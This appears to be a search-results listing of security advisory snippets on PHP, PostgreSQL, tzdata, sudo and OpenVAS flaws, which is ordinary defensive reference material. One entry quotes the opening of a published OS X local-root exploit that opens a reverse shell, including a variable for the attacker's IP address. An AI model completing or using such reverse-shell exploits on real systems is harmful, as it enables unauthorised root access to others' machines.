868 matches found
SUSE-SU-2016:2414-1 Security update for postgresql93
This update for postgresql93 to version 9.3.14 fixes several issues. These security issues were fixed: - CVE-2016-5423: CASE/WHEN with inlining can cause untrusted pointer dereference bsc993454. - CVE-2016-5424: Fix client programs' handling of special characters in database and role names...
MGASA-2016-0267 Updated php/xmlrpc-epi/timezone packages fix security vulnerability
Stack-based buffer overflow vulnerability in virtualfileex CVE-2016-6289. Use After Free in unserialize with Unexpected Session Deserialization CVE-2016-6290. Out of bound read in exifprocessIFDinMAKERNOTE CVE-2016-6291. NULL Pointer Dereference in exifprocessusercomment CVE-2016-6292...
Updated php/xmlrpc-epi/timezone packages fix security vulnerability
Stack-based buffer overflow vulnerability in virtualfileex CVE-2016-6289. Use After Free in unserialize with Unexpected Session Deserialization CVE-2016-6290. Out of bound read in exifprocessIFDinMAKERNOTE CVE-2016-6291. NULL Pointer Dereference in exifprocessusercomment CVE-2016-6292...
Scientific Linux Security Update : tzdata bug fix update on SL5.x, SL6.x i386/x86_64 (20160621)
This update fixes the following bugs : - In 2015, Egypt did not observe Daylight Savings Time DST. However, in 2016, Egypt observes DST from July 7 at 24:00 to October 27 at 24:00. As a consequence of this change, the tzdata package had incorrect data regarding DST in Egypt in 2016. This has been...
Updated php/timezone/php-timezonedb packages fix security vulnerability
The php package has been updated to version 5.6.19, which fixes several security issues and other bugs. See the upstream ChangeLog for more details. The timezone information in the timezone and php-timezonedb packages has also been updated to the latest, version 2016a...
MGASA-2016-0110 Updated php/timezone/php-timezonedb packages fix security vulnerability
The php package has been updated to version 5.6.19, which fixes several security issues and other bugs. See the upstream ChangeLog for more details. The timezone information in the timezone and php-timezonedb packages has also been updated to the latest, version 2016a...
php: Security update (7 CVEs)
The php package has been rebuilt and was uploaded to the Chaos Calmer 15.05 repository due to multiple security issues. VERSION 5.6.8-1 = 5.6.17-1 CHANGELOG Sun, 24 Jan 2016 21:47:52 +0100 18d121b Update to 5.6.17 Fixes CVE-2016-1903. Wed, 23 Dec 2015 16:00:14 -0500 766cfcc Update to 5.6.16 Wed, ...
JShielder - LAMP/LEMP Secure Deployment
JShielder is an open source tool developed to help sysadmins and developers secure the Linux servers on which they will be deploying any web application. This tool automates the process of installing all the necessary packages to host a web application and hardening a Linux server with little...
DLA-328-1 tzdata - new upstream version
Bulletin has no description...
SUSE: Security Advisory for PHP (SUSE-SU-2015:1265-1)
The remote host is missing an update for the...
SUSE-SU-2015:1253-2 Security update for php5
This security update of PHP fixes the following issues: Security issues fixed: CVE-2015-4024 bnc931421: Fixed multipart/form-data remote DOS Vulnerability. CVE-2015-4026 bnc931776: pcntlexec did not check path validity. CVE-2015-4022 bnc931772: Fixed an overflow in ftpgenlist that resulted in a...
The vulnerability of the SUSE Linux Enterprise operating system allows attackers to compromise the confidentiality of protected information.
The vulnerability of the SUSE Linux Enterprise operating system’s timezone package can lead to a violation of the confidentiality of protected information. Exploitation of this vulnerability can be carried out remotely...
[SECURITY] [DLA 179-1] tzdata new upstream version
Package : tzdata Version : 2015b-0squeeze1 Upstream published version 2015b. Changes since 2014h-0squeeze1 currently in squeeze-lts are the following: - New leap second 2015-06-30 23:59:60 UTC. - New DST for Mongolia. - New DST for Palestine. - New DST for Cancun Mexico. - New DST for Chile. - Ne...
DLA-179-1 tzdata - new upstream version
Bulletin has no description...
USN-2533-1 sudo vulnerability
Jakub Wilk and Stephane Chazelas discovered that Sudo incorrectly handled the TZ environment variable. An attacker with Sudo access could possibly use this issue to open arbitrary files, bypassing intended permissions...
UBUNTU-CVE-2015-0273
Multiple use-after-free vulnerabilities in ext/date/phpdate.c in PHP before 5.4.38, 5.5.x before 5.5.22, and 5.6.x before 5.6.6 allow remote attackers to execute arbitrary code via crafted serialized input containing a 1 R or 2 r type specifier in a DateTimeZone data handled by the...
Updated openvas-manager packages fix security vulnerability
Updated openvas-manager packages fix a security vulnerability: It has been identified that OpenVAS Manager before 4.0.6 is vulnerable to SQL injections due to improper handling of the timezone parameter in modifyschedule OMP command. It has been identified that this vulnerability may allow...
OSX-10.8.4-Local-Root-
Exploit Title: OSX 10.8.4 Local Root Priv Escalation Root Reverse Shell Date: 08-27-2013 Exploit Author: David Kennedy TrustedSec Website: https://www.trustedsec.com Tested On: OSX 10.8.4 import subprocess IPADDR for REVERSE SHELL - change this to your attacker IP address ipaddr = "192.168.1.1"...
Sql injection
SQL injection vulnerability in OpenVAS Manager before 4.0.6 and 5.x before 5.0.7 allows remote attackers to execute arbitrary SQL commands via the timezone parameter in a modifyschedule OMP command...
CVE-2014-9220
SQL injection vulnerability in OpenVAS Manager before 4.0.6 and 5.x before 5.0.7 allows remote attackers to execute arbitrary SQL commands via the timezone parameter in a modifyschedule OMP command...